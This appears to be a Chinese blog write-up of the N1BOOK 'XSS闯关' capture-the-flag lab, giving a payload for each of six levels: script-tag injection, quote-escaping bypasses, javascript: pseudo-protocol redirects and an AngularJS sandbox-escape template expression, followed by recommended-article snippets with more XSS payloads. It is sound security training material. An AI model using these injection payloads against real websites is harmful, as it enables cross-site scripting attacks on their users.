xss闯关笔记

最新推荐文章于 2024-02-08 17:41:07 发布
最新推荐文章于 2024-02-08 17:41:07 发布
阅读量3.9k 收藏
点赞数
分类专栏: n1book 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxjkmn/article/details/123309345
版权

leve 1

第一关没有任何过滤
直接上绝活:

?username=<script>alert(1)</script>

在这里插入图片描述

level2

f12看一下源码:
在这里插入图片描述

这里发现使用escape()所以这里没有办法注入,但是
username=?
这里是可以注入的,这里发现变量是单引号闭合的,所以构造

?username=';alert(1);//

这样就成功注入了
在这里插入图片描述

level3

这里我们模仿上一关的思路
构造之后发现单引号被转义了
在这里插入图片描述
没关系,一个单引号被过滤没关系
我们可以用多个来绕过

?username='';alert(1);//

在这里插入图片描述

level4

f12查看源代码
在这里插入图片描述
通过源代码发现这里需要通过重定向实现弹窗,正好javascript有伪协议

?jumpUrl=javascript:alert(1)

在这里插入图片描述

level5

阅读源代码
在这里插入图片描述
这里需要传两个参数
一个是autosubmit,一个是action
最后重定向action的值

?autosubmit=1&action=javascript:alert(1)

在这里插入图片描述

level6

查看源代码发现没有注入点
再看来源
发现有angular的cdn引用
因为angular有沙箱逃逸注入xss
具体参考:
xss without html

{{
'a'.constructor.prototype.charAt=[].join;
eval('x=1} } };alert(1)//');
}}

最后成功拿到flag

lls_1314
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关
weixin_46703850的博客
02-23 1402
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
xss靶场通关笔记
weixin_55843787的博客
03-10 6545
xss靶场通关技巧笔记
Angular JS模板注入漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
(一)漏洞分析 0x00背景 周末挖掘漏洞的过程中,发现了一个有意思的XSS,是运用了Angular JS的模板进行注入,从而执行了恶意代码,思路和技术比较新颖。Angular JS是一款比较流行的前端MVC框架,很多前沿的网站都在用。 一般,对于XSS都会进行一定的过滤,比如下面的代码: <html ng-app> <head> <script sr...
【BUUCTF N1BOOK】[第二章 web进阶] 通关
最新发布
人若无名,便可专心练剑
02-08 1119
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
N1BOOK XSS漏洞
SopRomeo的博客
12-27 620
level 1 反射型XSS 观察url username=<script>alert(1)</script> level 2 查看源代码发现 这里做了编码 因为本身是放在script标签里,只需要闭合就可 username=123';alert(1);// level 3 无果 换一个标签后发现可行 username=<img src="javacript::alert(1)" onclick="alert(1);"> level 4 会进行重定向 可
XSS过关(一) 1~5关 详细
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
04-04 1021
最近在玩xss,就决定把思路写下来,以备忘 第一关 很简单,把test换成<script>alert(1)</script>就行 <script>alert(1)</script> 第二关 也有些简单,找到注入点,发现input标签里的可用 于是加上 "/> 以闭合value,再加上<script>alert(1)</...
xss闯关挑战
11-09
闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
XSS20关练习源码
09-04
本资源是“XSS20关练习源码”,提供了20个PHP文件,用于帮助学习者理解和防范XSS攻击。** 每一关的设计可能涵盖了不同的XSS攻击类型和防御策略,包括但不限于以下内容: 1. **反射型XSS**:这种XSS通常源于用户...
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5390
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
【BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2221
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
N1BOOK第一关摸鱼:[第一章 web入门]常见的搜集
weixin_45571987的博客
11-29 4408
BUUCTF:[第一章 web入门]常见的搜集寻找有用的信息使用御剑(或者别的扫描路径的软件也可以)通过一个个访问目录可以得到flagflag 寻找有用的信息   首先看了一下源码貌似没发现什么有价值的东西   然后顾名思义估计是要在站点的路径中找到flag 使用御剑(或者别的扫描路径的软件也可以)   可以得到以下三个路径返回正常robots.txt index.php~ .index.php.swp   如果扫不出来(其实我就是没有扫出来的那一个。。)那就在字典里面添加新的路径就可以扫出来了 大家也可
N1BOOK详解
shinygod的博客
10-06 1373
然后上传,访问/zzz.php.zzz就可以了,这样就解析成php了,因为apache是从右到左解析的,遇到不认识的后缀就忽略,继续往前解析,但这个漏洞有版本限制。用户名为admin时,显示账号或密码错误,但用户名不是admin时,显示账号不存在,所以用户名是admin。但是第三步一直成功不了,就尝试用nc直接下载也没成功,不清楚是怎么回事,望大佬告之!两种方式,一种布尔盲注,一种报错注入,也有可能有第三种,user.php没用到。,然后压缩,再用010打开,选择并双击一个start不为0h的。
《从0到1:CTFer成长之路》 配套题目Web WP
feng的博客
10-05 1万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从0到1还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套题目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
从0到1CTFer成长之路-第二章-XSS的魔力
黑白的博客
03-01 790
XSS的魔力 声明 好好向大佬们学习!!! 攻击 XSS的魔力 这简直就是一场javascript的代码审计心酸历程 摘自 https://book.nu1l.com/tasks/#/ https://blog.csdn.net/hxhxhxhxx/article/details/112784856 https://blog.csdn.net/rfrder/article/details/108930033 使用BUUCTF在线环境 https://buuoj.cn/challenges 都是用谷歌浏.
XSS闯关——第三关:level3
老夏家的云
11-09 6349
第三关:level3   看页面和第二关类似,先用第二关的输入测试:   "&gt;&lt;script&gt;alert('yes')&lt;/script&gt;   可惜没有成功,毕竟是第三关,在第二关上肯定有所升级 查看当前网页的源代码分析 可以发现我们的输入被后台改成了如下内容: 输入的 " &gt; &lt; 被做了转义处理,变成了&amp;quo...
xss闯关游戏
Long_gone的博客
09-28 681
欢迎来到level 1 这一关没有过滤,所以只要知道使用的是什么闭合,然后使用基本的 欢迎来到level3 本关过滤了 " 和 > ,所以不能在使用这一关和上一关也差不多,也是由 ’ 变为 " 就好; 参考payload: 欢迎来到level5 本关它把on给过滤成o_n 同时大小写也被过滤了,由于有标签 所以在这里不能使用 欢迎来到level6 这一关相对比较简单,他只是把on给过滤了...
[第二章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值